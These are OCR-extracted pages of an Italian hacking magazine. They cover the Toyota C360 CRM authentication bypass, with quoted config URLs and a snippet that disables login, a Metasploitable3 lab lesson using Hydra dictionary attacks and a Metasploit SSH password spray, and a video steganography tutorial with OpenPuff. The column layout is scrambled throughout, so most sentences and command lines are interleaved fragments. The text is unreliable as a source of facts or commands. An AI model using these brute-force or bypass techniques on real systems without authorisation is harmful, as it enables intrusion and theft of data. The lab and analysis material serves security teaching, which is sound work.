E quindi se un bel giorno prodotti e in generale evitare che genere. L’esempio che facciamo è
qualcuno trova i suoi dati si rivolgano alla concorrenza. Il il recente caso di authentication
pubblicati da qualche parte, o profilo ha, come minimo, una bypass su Toyota C360,
qualche pubblicità un po’ troppo anagrafica, ma a seconda dei casi l’interfaccia web utilizzata dalla
personalizzata, è almeno in grado può includere anche informazioni famosa casa automobilistica.
GLOSSARIO
DI BASE
FRONTEND-BACKEND applicazioni web di una stessa azienda. Se gestito
Molte applicazioni web sono realizzate secondo la correttamente può essere una soluzione più sicura e
filosofia Frontend-Backend, in cui il fronted è efficiente, proprio perché c’è un unico punto di gestione
sostanzialmente “ignorante”, non accede al database e degli account.
non fa alcuna reale operazione. Si occupa solo di fare
chiamate http alle API fornite da un backend, il quale ROTTE
svolge effettivamente le varie operazioni chieste Le rotte http sono semplicemente gli URL relativi di una
dall’utente. applicazione. Per esempio, in facebook.com/messages,
la rotta per la messaggistica è /messages.
SSO Le applicazioni Angular utilizzano i “router” per gestire
Un Single Sign On è semplicemente un servizio le rotte e stabilire quale funzione debba rispondere
centralizzato che offre delle API per il login di diverse a un URL.
20
VULNERABILITÀ
Entrati nel CRM,
è possibile cercare un
cliente semplicemente
conoscendo il suo nome
e cognome.
FONTE: https://eaton-
works.com/2023/03/06/
toyota-c360-hack/
IL MOMENTO ANGOLARE Questo ci fa capire, per esempio, Questo significa che, più o meno
Il CRM di Toyota in questione era che l’ambiente di staging si trova facilmente a seconda delle
raggiungibile all’url https://c360. su dev.customercentral.toyota. implementazioni, l’utente può
customercentral.toyota.com/, ed è com, che una volta c’era anche la modificare il codice stesso. In
una applicazione realizzata in gestione degli utenti degli Stati questo caso, gli esperti di sicurezza
Angular. Questo significa che Uniti (che probabilmente adesso informatica hanno scoperto che
l’applicazione viene eseguita saranno su un altro CRM), e che bastava commentare un paio di
interamente nel browser l’autenticazione avviene tramite il funzioni per evitare il redirect sulla
dell’utente, ovviamente con single sign on di Microsoft. Il sito pagina di login di Microsoft in
chiamate alle API del backend. di produzione, quando era attivo, main.js:
Ed è una single page application, restituiva un codice 403,
quindi tutto sommato abbastanza login(){
Unauthorized, senza alcun punto
facile da analizzare. Controllando il // this.msalService.loginPopup().
di accesso. Probabilmente era
codice sorgente, si vedono alcune subscribe(
necessario accedere con qualche
variabili d’ambiente con i vari URL: // (response:
token fornito da un’altra pagina di
AuthenticationResult) /> {
login ignota (magari un sito
// console.info({ response:
const environment = { aziendale). Apparentemente,
response });
production: false, quindi, senza alcuna possibilità di
// this.msalService.instance.
apiBaseURL: ‘https: //dev. entrare.
setActiveAccount(response.
customercentral.toyota.com’, L’ambiente di staging, invece,
account);
envName: ‘dev’, propone una pagina di login del
// },
applicationURL: ‘https: //c360. Single Sign On di Microsoft, con le
// (err) /> {
dev.customercentral.toyota.com’, credenziali aziendali di Toyota
// console.error({err:err});
/* (che evidentemente utilizza i
// }
US legacy application servizi di Office365).
// );
/* Naturalmente, il single sign on di
// this.msalService.loginRedirect();
// azureClientId: ‘49465297-34e9- Azure è molto affidabile, non si
}
41b5-b44b-aS3703786574’, può certo forzare se non si
e restituire, al posto del
// authority: ‘https: //login. conosce la password di un utente.
risultato del login, un oggetto
microsoftonline.com/tmnatest. Però bisogna vedere come è stato
JSON vuoto in vendor.js:
onmicrosoft.com’ gestito il processo di
ClientApplication.prototype.
/* autenticazione. E, nel caso del
getActiveAccount = function () {
Mexico application CRM C360, l’autenticazione viene
//return this.browserStorage.
// gestita direttamente dal frontend
getActiveAccount();
azureClientId: ‘beSal6ef-b40f- Angular. Questo è un problema,
return {};
4cc7-9c1e-476b30579d32”, perché per la natura stessa di
};
authority: ‘https: //login. Angular il codice viene scaricato
microsoftonline.com/tmnatest. nel browser dell’utente ed
onmicrosoft.com’ eseguito direttamente lì. L’applicazione, a quel punto, ritiene
21
HACKTUALITÀ
Per ogni cliente paese, equivalenti al 20% circa del
censito è possibile mercato (https://www.best
vedere la lista di -selling-cars.com/brands/2021
veicoli acquistati, -full-year-global-toyota-worldwide
riparazioni -car-sales-production-and-exports/).
effettuate, indirizzo, E il CRM C360 contiene dati non
telefono ed email. solo dei nuovi clienti ma anche di
FONTE: https:// quelli passati, incluse le varie
eaton-works. riparazioni richieste nelle officine.
com/2023/03/06/ Ci sono tutti i vari dati anagrafici e
toyota-c360-hack/ di contatto, incluso l’indirizzo di
casa, il telefono e l’email.
22
S I C U R E Z Z A
METASPLOITABLE3 E ora... il cracking delle password
Continua il corso su come aumentare le competenze da pentester �������������������������������� 24
23
SICUREZZA
PARTE SETTIMA
E ORA...
IL CRACKING
DELL E P ASSWORD
co m e au m en ta re le competenze
o su
Continua il nostro cors m ero ut ili zz eremo alcune wordlist
to nu
da pentester: in ques de no m in at o “a tt ac co a dizionario”
che è
per effettuare quello
I
l nostro pentest della VM ambienti Unix/Linux. exploit-db.com), o meglio della
Metasploitable3 – la In questo modo, siamo riusciti sua interfaccia a riga di
macchina virtuale a identificare la versione del comando presente
“vulnerabile by design” servizio SSH disponibile sulla nativamente in Kali Linux,
sviluppata da Rapid7 come porta 22 di Metasploitable searchsploit
ambiente addestrativo per le (OpenSSH 7.1): una versione [figura #2]. Il problema di
verifiche di sicurezza e l’utilizzo che, sebbene piuttosto datata, sicurezza più rilevante che
dei propri tool (Metasploit in non è risultata affetta da abbiamo individuato consiste
primis) – sta iniziando a dare i vulnerabilità di gravità elevata, nella vulnerabilità CVE-2018-
primi frutti. Nelle scorse come testimoniato dal risultato 15473 [figura #3] di tipo “user
puntate, dopo il tuning iniziale (decisamente al di sotto delle enumeration”, grazie alla quale
dell’ambiente virtuale che aspettative) delle indagini è possibile stabilire se un
utilizziamo per il penetration effettuate avvalendoci di determinato nome utente sia
test [figura #1], ci siamo ExploitDB (il noto database definito o meno sul sistema
dedicati a un’iniziale fase di pubblico di vulnerabilità, locale attraverso un banale
scansione, volta a individuare i consultabile al link https:// tentativo di login.
servizi in esecuzione sul
sistema target. Al
completamento di questa
figura #1
attività, abbiamo focalizzato la
nostra attenzione su un
servizio in particolare, SSH,
attirati dall’inconsueta
associazione tra un sistema
Windows e un servizio Un penetration test che si rispetti non può prescindere
generalmente associato ad dalla realizzazione, prima di iniziare, di una mappa della rete target.
24
METASPLOITABLE3
figura #2 figura #3
Scopriamo la VM
M etasploitable3 è pensata per un uso addestrativo, al
fine di consentire ai penetration tester in erba di
migliorare le proprie skill. A tal riguardo, costituisce un
sicurezza della rete testata, ne marcano / segnalano la
presenza nel report finale);
• L’impiego di tecniche aggiuntive (come l’offuscamento,
importante upgrade rispetto alla sorella maggiore l’utilizzo di contenuti embedded nei file, attributi dei file
(Metasploitable2, a cui abbiamo dedicato tante puntate particolari o permessi d’accesso particolarmente
della nostra serie), introducendo novità di rilievo come: stringenti) a protezione delle flag, per rendere più
• Il ricorso a Windows, che consente di ampliare la nostra realistico l’accesso alle carte, simulando quanto avviene
esperienza (sin qui formatasi esclusivamente in ambiente nel mondo reale (in cui le informazioni più importanti sono
GNU/Linux, essendo Metasploitable2 una VM basata su generalmente protette da misure di sicurezza aggiuntive);
una distro Linux) alla trattazione di vulnerabilità e di • L’uso di un approccio di tipo gamification, in cui – al
problematiche di sicurezza peculiari di quello che è uno pari di quanto avviene in molte piattaforme (soprattutto
dei sistemi operativi più diffusi in ambito desktop e server; on line) per aspiranti pentester – la VM ci offre la possibilità
• L’utilizzo dei flag, appositi file utilizzati nei contest CTF di sfidare noi stessi (e magari gli amici) nella ricerca del
(acronimo, per l’appunto, di Capture the Flag) per “mazzo di carte” nascosto al suo interno, che costituisce il
simboleggiare quegli asset aziendali obiettivo tanto degli formato specifico con cui gli sviluppatori di
attaccanti che dei penetration tester (i quali, a Metasploitable3 hanno voluto rappresentare le flag da
dimostrazione del lavoro svolto e dell’eventuale esistenza catturare (mettendoci letteralmente la faccia, giacché ogni
di una o più vulnerabilità in grado di compromettere la carta è dedicata a uno di loro).
25
SICUREZZA
figura #4 questo modo, ci siamo garantiti
la persistenza dei nomi utenti
“scoperti” anche a fronte della
chiusura del framework: dopo
aver avviato nuovamente, con il
comando:
26
DASDASDSDASDASDASD
METASPLOITABLE3
figura #6 figura #7
Hydra è un tool molto potente e versatile, Dalla shell di Metasploit è possibile invocare “awk”
come si può notare dalle tantissime opzioni e “cat”, che ci consentono di manipolare i file di
di configurazioni, che il manuale ci illustra testo eventualmente prodotti e/o esfiltrati durante
con dovizia di particolari. la nostra verifica di sicurezza.
ambienti privi di una password completata – un certo effort in I TOOL
policy sufficientemente termini di tempi d’esecuzione Se riteniamo congruo il
robusta – può portare a e un non trascurabile rischio di rapporto costo/benefici di
risultati senz’altro rilevamento, vista la presenza questa attività, allora possiamo
soddisfacenti, sebbene di ripetuti tentativi di login in inserirla nella nostra verifica di
comporti – come nel caso un breve periodo per il sicurezza, a patto di individuare
dell’enumerazione appena medesimo username. quale sia il tool da utilizzare per
27
SICUREZZA
figura #8 figura #9
L’esecuzione di Hydra può richiedere del tempo, Ecco il sogno di ogni penetration tester: la
ma può portarci a individuare una coppia compromissione dell’account Administrator, per
di credenziali valide per l’accesso al sistema! giunta con un “semplice” password cracker!
lo scopo. Esistono infatti conservati, al momento, gli output che si vuole creare.
tantissimi software progettati e username enumerati. Hydra, tuttavia, non ha
realizzati proprio per eseguire bisogno di un file CSV, ma
questo particolare task: tra tutti, ESPORTAZIONE piuttosto di una semplice lista
non possiamo non citare Hydra DAL DATABASE (che si tratti di username o di
[figura #6], che molti di voi Finora ci siamo limitati password) di valori in cui ogni
probabilmente ricorderanno semplicemente a consultare item sia inserito,
dalle precedenti puntate di tali username [figura #5], ma il singolarmente, su una riga
questa serie. Per effettuare un comando “creds” sin qui distinta di un file di testo.
attacco del dizionario utilizzato ne consente anche Dobbiamo quindi sottoporre il
sull’autenticazione SSH, il tool ha l’esportazione in formato CSV CSV appena ottenuto a una
bisogno di due wordlist: l’elenco (Comma Separated Value), a piccola manipolazione,
delle password da provare e patto di invocarlo con l’opzione utilizzando awk:
l’elenco dei nomi utente da -o:
forzare. Se per la prima msf6> awk –F “\”,\”” ‘{print
possiamo rivolgerci, ancora una msf6> creds -o /home/ $4}’ /home/garrick/
volta, alla directory /usr/share/ garrick/metasploitable3/ metasploitable3/username.csv >
wordlists di Kali Linux, per la username.csv /home/garrick/metasploitable3/
seconda è necessario esportare i usernamePT.t t
contenuti del db interno di dove /home/garrick/
Metasploit, che rappresenta metasploitable3/username.csv in modo da estrarre il quarto
l’unico repository dove sono è il path assoluto del file di campo (quello che, per
l’appunto, specifica il nome
figura #10 Il modulo utente enumerato) di ciascuna
riga del file CSV, e salvare
ssh_login
l’elenco risultante nel file
consente di
usernamePT.txt (che nel
effettuare il login
nostro specifico caso è salvato
su un server SSH
nella directory /home/
remoto tramite
garrick/metasploitable3/). Al
credenziali
pari di awk, possiamo
specificate dal
utilizzare anche cat all’interno
pentester e/o di Metasploit, in modo da
prelevate da un poter visualizzare a video il
dizionario. risultato dei nostri sforzi:
28
DASDASDSDASDASDASD
METASPLOITABLE3
figura #11 • -s specifica la porta ove il
servizio target è posto in
ascolto;
• -t indica il numero di task
Le operazioni preliminari per utilizzare correttamente ssh_login: paralleli che Hydra può
è necessario selezionare il target, l’elenco degli username impiegare per velocizzare le
da utilizzare, l’elenco delle password (o la password, come nel operazioni di attacco.
nostro caso) da adoperare.
SECONDA SCANSIONE
• -L specifica, per l’appunto, il Dopo un certo tempo (quando
msf6> cat /home/garrick/
nome del file contenente la si lanciano attacchi alle
metasploitable3/usernamePT.t t
lista degli utenti da sottoporre password – siano essi basati
all’attacco; su dizionario, brute force o
ci mostra l’elenco dei nomi • -P individua la wordlist delle password spray – è sempre
utenti, pronto per essere dato potenziali password da buona norma armarsi di
in pasto a Hydra [figura #7]. provare per ciascun utente pazienza… oppure lavorare in
(visto che si tratta del primo parallelo su un’altra attività!),
HYDRA tentativo abbiamo optato per Hydra ci restituirà una
Dopo aver avviato il terminale, una wordlist dalle dimensioni schermata come quella di
navighiamo quindi nella piuttosto contenute, costituita [figura #8]: abbiamo trovato
directory /home/garrick/ da circa 100 password); una coppia di credenziali
metasploitable3/ ove abbiamo • -e nsr istruisce il tool a valide! Stiamo parlando delle
salvato l’elenco degli username. provare, in aggiunta a tale credenziali (vagrant, vagrant),
A questo punto non ci resta che lista, anche tre password che però – presentando una
invocare il tool, con il comando: “specifiche”: la password password coincidente con il
vuota, quella coincidente con nome utente – sono frutto del
# hydra -L usernamePT.t t -e nsr lo stesso nome utente, e ricorso all’opzione -e nsr
-P /usr/share/wordlists/ quella ottenuta dall’inversione appena illustrata. Stando così
metasploit/snmp_default_pass.t t dell’username (la coppia di le cose, dobbiamo concludere
metasploitable3 -s 22 ssh -t 32 credenziali [root,toor] vi che la wordlist utilizzata non
ricorda qualcosa, giusto per ha portato ad alcun risultato:
Ecco significato delle opzioni: rimanere in tema?); vale la pena effettuare almeno
29
SICUREZZA
figura #12 peraltro ha la stessa password
del precedente, ovvero vagrant
[figura #9].
ANCORA METASPLOIT
A questo punto potremmo
raffinare ulteriormente l’attacco
provando a utilizzare una terza
wordlist… oppure lasciare a voi
Anche se non abbiamo compromesso ulteriori account, in questo questo esperimento, e virare su
momento disponiamo di due sessioni attive verso la macchina un altro tipo di attacco. Se infatti
target, una delle quali - peraltro - con privilegi di amministratore. la password vagrant è così
quotata da essere adoperata da
un secondo tentativo, potenziali candidati. ben due utenti, non è illogico che
adoperando un dizionario più Il comando per eseguire il possa essere stata scelta anche
ampio per incrementare le nuovo attacco è: da altri… Per verificare se sia così,
nostre chance di successo. dobbiamo eseguire il cosiddetto
Visto che per i nomi utenti la # hydra -L usernamePT.t t -e password spray attack,
strategia ha funzionato, nsr -P /usr/share/wordlists/ provando a sottoporre la
proviamo a optare per una metasploit/uni _passwords.t t medesima password (vagrant, per
wordlist delle password più metasploitable3 -s 22 ssh -t 32 l’appunto) a tutti gli username
diffuse in ambiente Unix: enumerati nelle puntate
/usr/share/wordlists/ e ci porta alla compromissione precedenti. Possiamo affidare
metasploit/unix_passwords. di un altro account: addirittura questo compito a Metasploit e al
txt, che vanta oltre 1.000 l’account Administrator, che suo modulo ssh_login
Metasploitable).
• Inizializzare il database per il primo utilizzo, grazie a msfdb:
Si tratta di un tool in grado non solo di verificare il livello di
sicurezza di sistemi operativi, apparati di rete e web # sudo msfdb init
application, ma anche di fornire ai suoi utilizzatori un pletora
di strumenti in grado di spaziare dalla network discovery Una volta completate queste operazioni, possiamo:
all’individuazione e al successivo sfruttamento di vulnerabilità • Avviare Metasploit, con il comando:
note, sino all’esecuzione di attacchi di ingegneria sociale. Il
# msfconsole
tutto potendo contare su un database di exploit (oltre 1.500)
costantemente manutenuto e, soprattutto, sempre
• Creare un’apposita “area di lavoro” (workspace in inglese),
aggiornato.
che chiameremo semplicemente “metasploitable3”, ove far
Come se non bastasse, Metasploit dispone di una versione,
confluire – salvandole in un’area dedicata del database interno
“Metasploit Framework”, rilasciata gratuitamente da Rapid7
- tutte le evidenze che raccoglieremo nel corso del nostro
come software libero e non a caso inclusa nativamente
pentest (questa operazione va effettuata una sola volta):
all’interno della distribuzione Kali Linux che utilizziamo per
per il nostro pentest. Come visto nella scorsa puntata, prima msf6>workspace -a metasploitable3
di avviare Metasploit per la prima volta è opportuno
effettuare alcune piccole attività propedeutiche volte ad • Selezionare la suddetta workspace
assicurare la corretta configurazione del relativo database
msf6> workspace metasploitable3
interno:
• Avviare il servizio postgresql, a cui si deve la gestione del e iniziare il nostro lavoro!
30
DASDASDSDASDASDASD
METASPLOITABLE3
Pentest: cosa c’è da sapere, per non rischiare!
P rima di avviare una qualsiasi attività di pentesting/
vulnerability assessment su un’infrastruttura al di fuori del
nostro controllo e della nostra proprietà è bene ricordare
• Mai eseguire un penetration test (o anche solo una parte di
esso) su sistemi che non siano di vostra proprietà, a meno
che non si disponga di un permesso da parte di tutti i
quali possano essere le conseguenze di un uso scriteriato proprietari dell’infrastruttura da testare;
delle skill che apprenderete seguendoci in queste puntate. • Richiedere che tale permesso sia esplicitato in forma scritta
Non possiamo infatti dimenticarci quanto prevede l’articolo attraverso la cosiddetta manleva, ovvero un documento
615 ter del Codice Penale: “chiunque abusivamente si introduce formale che stabilisce le “regole d’ingaggio” per il pentester,
in un sistema informatico o telematico protetto da misure di chiarendo l’altro quali siano i sistemi da verificare, il tipo di
sicurezza ovvero vi si mantiene contro la volontà espressa o test effettuare e i vincoli a cui attenersi nell’esecuzione della
tacita di chi ha il diritto di escluderlo, è punito con la reclusione verifica di sicurezza.
fino a tre anni”. In qualità di penetration tester, potremmo
rischiare di ritrovarci accusati di aver effettuato un accesso Agli occhi della legge, è proprio la manleva (e il rispetto dei
abusivo a un sistema informatico, se – pur agendo in buona relativi termini) a distinguere un signor professionista (ovvero
fede – non provvediamo a seguire alcune regole basilari: il pentester) da un volgare pirata informatico…
[figura #10]: si tratta di un tool quindi preoccupiamoci di msf6> set PASSWORD vagrant
molto potente, in grado di impostare correttamente le
eseguire tanto un semplice login variabili che ci consentiranno di quindi avviare il modulo con il
SSH quanto di condurre diversi condurre l’attacco. Per i nostri seguente comando:
attacchi a questo tipo di scopi è sufficiente impostare –
autenticazione… incluso il oltre al target, l’elenco degli msf6>run
password spray attack di cui utenti enumerati e il valore della
abbiamo bisogno! password da provare per Contrariamente alle aspettative,
ciascun utente [figura #11]: il risultato non ci premia con
MODULO SSH_LOGIN ulteriori account compromessi:
Torniamo alla schermata del msf6> set RHOSTS ma in compenso, abbiamo
framework e carichiamo il metasploitable3 adesso [figura #12] due sessioni
modulo con il comando: msf6> set USER_FILE /home/ SSH aperte verso la macchina
garrick/metasploitable3/ target, una con l’account
msf6> use scanner/ssh/ssh_login usernamePT.t t Administrator (e quindi con
privilegi di amministratore!) e
figura #13 una con l’account vagrant. Come
se non bastasse, Metasploit ha
provveduto ad aggiornare
automaticamente il database
delle credenziali, associando la
password vagrant agli account
compromessi: ne possiamo
avere la prova eseguendo
nuovamente il comando:
msf6> creds
A seguito dell’esecuzione del modulo ssh_login e dell’effettiva
compromissione di due account, Metasploit aggiorna Un bel risultato [figura #13],
automaticamente l’elenco delle credenziali scoperte, associando non c’è che dire… e un’arma in
la password “vagrant” ai rispettivi account, come ci mostra l’output più da utilizzare nel prosieguo
del comando “creds”. del nostro pentest!
31
SICUREZZA
IL M E S S A G G I O
SI CELA
T R A I P I X E L io ni te stua li, audio, immagini e file
fo rm az
Come nascondere in ù vi de o, in qu al si as i formato, anche
oo pi
binari all’interno di un
lla steganografia
compresso. Magia de
L
a continua evoluzione visto che storicamente risale a essere nascosti all’interno del file
tecnologica ha imposto lo oltre 2.000 anni fa), le tecniche cover mentre per embedding
sviluppo e l’avanzamento di per nascondere informazioni efficiency si intende la capacità
determinate tecnologie che possono essere utilizzate per dell’algoritmo di steganografia di
hanno portato, in pochi anni, alla mitigarne gli attacchi informatici, nascondere quante più
produzione di dispositivi di fornendo proprietà di sicurezza, informazioni sensibili senza
storage sempre più capienti e, in privacy, confidenzialità e integrità creare distorsioni apprezzabile al
proporzione, meno costosi, a un dei dati. I due aspetti più file cover (impercettibilità).
netto miglioramento delle importanti di un algoritmo
capacità delle videocamere anche steganografico, che si tratti di un UN PO’ DI TEORIA
per le “entry-level” e a sensori file testo, immagini, audio o video Ulteriori caratteristiche richieste
sempre più performanti a costi [figura #1], sono le proprietà che alla video-steganografia, così
contenuti. Lo scenario riportato vanno sotto il nome di come a qualsiasi altro metodo
ha incrementato embedding payload e steganografico, vedono la
esponenzialmente l’ammontare embedding efficiency. sicurezza e la robustezza anche
dei dati trasferiti via rete o cavo e L’embedding payload indica la dal punto di vista della
di riflesso negli appositi dispositivi quantità di dati che possono compressione dei dati intesa
di memorizzazione (hard disk,
flash USB ecc.) tipicamente figura #1 La classificazione
informazioni sensibili come dati dei metodi
personali, immagini, informazioni steganografici
medicali, dettagli bancari e digitali si divide in
videoriprese pubbliche e/o private. quattro
sottocategorie:
E LA SICUREZZA? immagini, testo,
Argomenti di ricerca fin dalla audio e video.
nascita delle comunicazioni
digitali (sebbene la steganografia
non risulti essere tanto recente,
32
STEGANOGRAFIA VIDEO
GLOSSARIO
come la capacità di non perdere DI BASE
le informazioni che celano in
seguito a una compressione del COVER MEDIA Il file che celerà le dei metodi più noti è ad esempio
file stego, di qualsiasi tipo e a informazioni riservate. l’LSB (Least Significant Bits).
qualsiasi formato ci si riferisca. Generalmente si tratta di un video,
Va da sé come occorra accettare ma può essere anche un file di SCRAMBLING Rendere
testo, un file pdf, immagini o file indecifrabile, codificare, criptare.
sempre un compromesso tra la
audio nei diversi formati. Metodologie con le quali viene
sicurezza, la robustezza e la manipolato un file audio/video/dati
capacità di nascondere dati STEGO MEDIA È il file risultante, per renderlo intellegibile.
senza creare artefatti audiovisivi completo di informazione segrete,
che potrebbero far sorgere ottenuto dopo aver applicato TRANSFORM DOMAIN Questo
qualche sospetto. l’algoritmo di steganografia al metodo converte blocchi di
Cover Media. fotogrammi del file cover dal
dominio spaziale al dominio di
FRAME PER SECONDO STEGANALISI Scienza il cui scopo trasformazione così definito
Nella sua forma più intuitiva è vede la rilevazione, previa poiché vengono applicati metodi
possibile considerare un video opportuna analisi in funzione del matematici; tra i più usati risultano
come un insieme di immagini formato del file, di informazioni la DWT (Discrete Wavelet
statiche (frame) prese in istanti nascoste. Transform), la DCT (Discrete
Un esempio di base di Steganalisi Cosine Transform) e loro inverse. I
temporali differenti. Quando
è stato riportato nel numero 267 dati segreti vengono incorporati
vengono mandate in esecuzione di HJ. nei coefficienti della
una dopo l’altra ne risulta il tipico trasformazione nei bit meno
movimento da pellicola SPATIAL DOMAIN Tecnica che significativi prima di eseguire la
cinematografica. Per evitare utilizza i valori di intensità che trasformazione inversa e il
possono assumere i pixel nel “riassemblaggio” per produrre il
“movimenti a scatto” e avere una
cover frame per nascondere i dati file stego. Le descrizioni formali
buona fluidità il minimo numero segreti, ad esempio nei bit esulano dal seguente contesto e si
di frame necessari in un secondo dell’intensità del colore per i 3 rimanda gli interessati a testi
non dovrebbe scendere sotto i colori RGB (Red-Green-Blue). Uno specializzati.
25 ovvero, nella nostra analogia,
considerando una persona che
cammina, al soggetto deve dall’altro sono richieste maggiori a entrare in un’area riservata e
essere fatta una fotografia ogni capacità di storage nel caso si rilevate nelle sequenze video
1/25 secondo (40 millisecondi). volesse memorizzare tutto su catturate dalla telecamera di
Va da sé che se il numero di hard disk o di flusso in streaming, sorveglianza; i dati dei soggetti
frame è pari a 30 (33ms a e quindi di banda di rete, qualora rilevati possono essere
quadro) o a 60 (16,7ms a quadro) lo si volesse trasmettere. In base incorporati nelle sequenze video.
i movimenti diventano sempre ai concetti riportati, la video
più armoniosi e realistici, di steganografia nella sua forma IL DOMINIO COMPRESSO
contro c’è il numero di basilare può essere vista come I metodi di steganografia raw
fotogrammi che passa, ad una sorta di “estensione” della domain considerano il Cover
esempio in un tempo di soli 60 steganografia applicata alle Media come una sequenza di
secondi, dai 1.500 nel caso di immagini. I campi di utilizzo fotogrammi all’interno dei quali
25fps (frame per secondo) ai vanno dallo spionaggio vengono nascoste le
1.800 per 30fps per arrivare ai industriale e governativo, militare informazioni previo uso di
3.600 per 60fps. Se da un lato si e paramilitare, settore medicale e diverse tecniche le quali
migliora la realtà del movimento multimedia. Applicazioni più possono operare nel dominio
(sebbene oltre un certo limite comuni vedono la steganografia spaziale (Spatial Domain)
l’occhio umano non riesce più a video utilizzata per preservare la oppure nel dominio della
percepirne le differenze), privacy delle persone autorizzate frequenza (Transform Domain);
33
SICUREZZA
figura #2 figura #3
Dallo schema di codifica appare netta la distinzione Le informazioni che si vogliono celare vengono
tra quello che viene definito “raw domain” (dominio incorporate in uno o più fotogrammi del video.
grezzo) e il “compressed domain”.
Ampliamo le conoscenze
c’è la facilità di implementazione
dall’altro c’è il problema che
trattasi di tecniche facilmente
attaccabili in particolare dai
cosiddetti attacchi di
O ltre a OpenPuff suggeriamo il network gratuito ResearchGate (https://www.
researchgate.net/) dedicato a tutte le discipline scientifiche nel quale
scienziati e ricercatori condividono articoli, rispondono a quesiti e trovano
compressione. C’è in realtà collaboratori. Inserendo nel rigo di ricerca una stringa come video
anche un motivo più pratico che steganography verranno riportati decine e decine di risultati alcuni dei quali è
possibile consultare direttamente poiché presente l’associato documento o
rende la video steganografia raw
pubblicazione generalmente in formato PDF.
domain meno utilizzabile; i video
in forma compressa sono
34
STEGANOGRAFIA VIDEO
figura #4 l’informazione segreta in più file
anche di natura diversa tra loro,
ad esempio utilizzando 2 file PDF,
1 file MP3, 2 file video ecc. In
sostanza “pezzi” (chunk)
dell’informazione complessiva
verranno celati nei 2 file video,
un’altra certa quantità nei 2 file
PDF e così via. L’utente per poter
recuperare l’informazione dovrà
essere in possesso di tutti i file;
un po’ come accade con gli
L’installazione in Windows di OpenPuff non necessita di particolari archivi compressi multipli, se non
accorgimenti. E anche in GNU/Linux non comporta alcun problema si hanno tutti i file a partire dal
poiché è dato pienamente funzionante con WINE (https://www.winehq. numero 1 non è possibile
org/) e pertanto andrà installato utilizzando il gestore dei pacchetti. recuperare l’intero contenuto.
OpenPuff oltre che
permette di raggiungere gli presenza di Wine e procederà steganografico è anche un
obiettivi indicati. Noi l’abbiamo eventualmente all’installazione programma multi crittografico; i
testato su distribuzione ROSA per poi lanciare il programma. Lo dati vengono dapprima
Linux (https://www.rosalinux.ru/) script Uninstall.sh se lanciato sottoposti a crittografia, fa
e tutto ciò che occorre fare, una cancellerà tutta la cartella seguito un’operazione di
volta effettuato il download e OpenPuff_release e rimuoverà scrambling quindi aggiunto del
decompresso il file zip, è entrare la cartella nascosta .wine nella “rumore” casuale (whitening). A
nella cartella creata dalla home utente, quindi attenzione dispetto di questa apparente
decompressione cd OpenPuff_ perché in caso vi fossero installati complessità, il suo uso è molto
release e lanciare il comando dei programmi che girano in intuitivo e si riduce a 4 passi
wine ./OpenPuff.exe il quale Wine questi verrebbero essenziali. Vediamoli in dettaglio.
non installerà nulla, lancerà cancellati! Dalla schermata di [figura #4]
direttamente il programma clicca su Hide nel pannello
[figura #4]. Lo script OpenPuff. ALTRE FUNZIONALITÀ Steganography per entrare nella
sh verificherà, su distribuzioni Molto interessante la capacità di sezione Data Hiding [figura #5].
Debian/Ubuntu e derivate, la OpenPuff di nascondere Nel riquadro (1) dovranno essere
figura #5
inserite le password tra loro non
correlate necessarie alla
crittografia e allo scrambling.
Nel riquadro di destra (2) occorre
indicare i dati che si desiderano
nascondere utilizzando il
pulsante Browser. Nel rigo Size
verrà riportata la dimensione che
il/i file carrier dovranno
nascondere. Il totale del valore
verrà riportato nel riquadro (3)
Carrier Selection nel rigo in
OpenPuff consente di celare i dati all’interno di tipologie diverse basso Selected/Total dove
occorre aggiungere il o i carrier
di cover media. In ogni momento si può conoscere la dimensione
che dovranno farsi carico di
che i carrier dovranno nascondere.
35
SICUREZZA
figura #6 Occorre rispettare 3 regole
fondamentali: inserire
correttamente le password (A
con A, B con B e C con C),
rispettare l’ordine dei carrier in
fase di implementazione
(colonna Chain Order)
aggiungendo i file stego uno
dopo l’altro in base all’ordine di
implementazione originale e
infine rispettare l’esatta selezione
in Bit Selection Options ai valori
Con OpenPuff è possibile utilizzare un certo numero di carrier originali per ogni singolo formato
con le immagini nei formati BMP, JPG, PCX, PNG e TGA, audio con di file utilizzato come carrier e
supporto ad AIFF, MP3, NEXT/SUN e WAV, documenti PDF e file video infine indicando il percorso di
(3GP, FLV, MP4, MPG, SWF, VOB). salvataggio [figura #6].
In [figura #7] il confronto tra 2
nascondere i dati. ciò che andrà ad alterare il file e dei 4 file originali utilizzati dal
Se ne dovranno aggiungere in che potrebbe destare qualche programma e i rispettivi file
numero e tipologia tali da riuscire sospetto. A titolo di esempio, in stego. Essendo dei video una
a coprire il totale da celare. un file VOB di circa 40MB è fotografia non rende l’idea, gli
Quando ciò accadrà il rigo possibile nascondere poco meno interessati non possono che
Selected/Total diventerà verde di 7KB impostando il massimo provare la procedura e
e sarà quindi possibile passare numero di bit ½ (50%) in Bit constatare loro stessi il risultato.
al riquadro (4) Bit Selection Selection Options. Al termine Il software è sviluppato da un
Options per la selezione del click sul pulsante Hide Data in ingegnere italiano, quindi si ha il
numero di bit da utilizzarsi basso a destra indicando il manuale (anche) in questa lingua,
(tecnica LSB). Può sorprendere la percorso di salvataggio dove che suggeriamo di leggere poiché
bassa capacità di dovranno essere salvati i file entra nel vivo del principio di
immagazzinamento dei file video, stego. Per il recupero dalla funzionamento del programma e
ma se si vuole avere maggiore schermata di [figura #4] optare dal punto di vista della
sicurezza e più impercettibilità va per Unhide nel pannello crittografia così come su alcuni
da sé che deve ridursi l’entità di Steganography. concetti di steganografia e
figura #7
stagnalisi. In più raccomandiamo
di visitare il sito di OpenPuff
poiché presenta nella pagina del
software una vera e propria
miniera di informazioni, articoli,
pubblicazioni, video, letture, tesi
e svariati esempi applicativi
sull’argomento (leggere anche il
Box di pagina 34 “Ampliamo le
conoscenze”). Al solito in caso di
comunicazioni, suggerimenti,
prove e quant’altro si può
sempre fare riferimento al forum
Il confronto: a sinistra 2 file originali, 2 stego destra di HJ (https://hackerjournal.it/
e al centro l’informazione nascosta. forum/).
36
ABBONATI
ALLA TUA RIVISTA PREFERITA
TE LA SPEDIAMO APPENA STAMPATA!
SOLO ARTICOLI ORIGINALI DEI MIGLIORI ESPERTI IN CIRCOLAZIONE SIAMO
TOR
CONSEGNA GARANTITA ENTRO 48H
TREMNAATTEI
SMARTPHONE
N.274 Novembre\Dicembre
A PROVA
DI SPIA!
App 100% legali potrebbero nascondere
delle insidie. Le dritte per sgamarle
SOLO ARTICOLI ORIGINALI DEI MIGLIORI ESPERTI IN CIRCOLAZIONE SIAMO
TORN
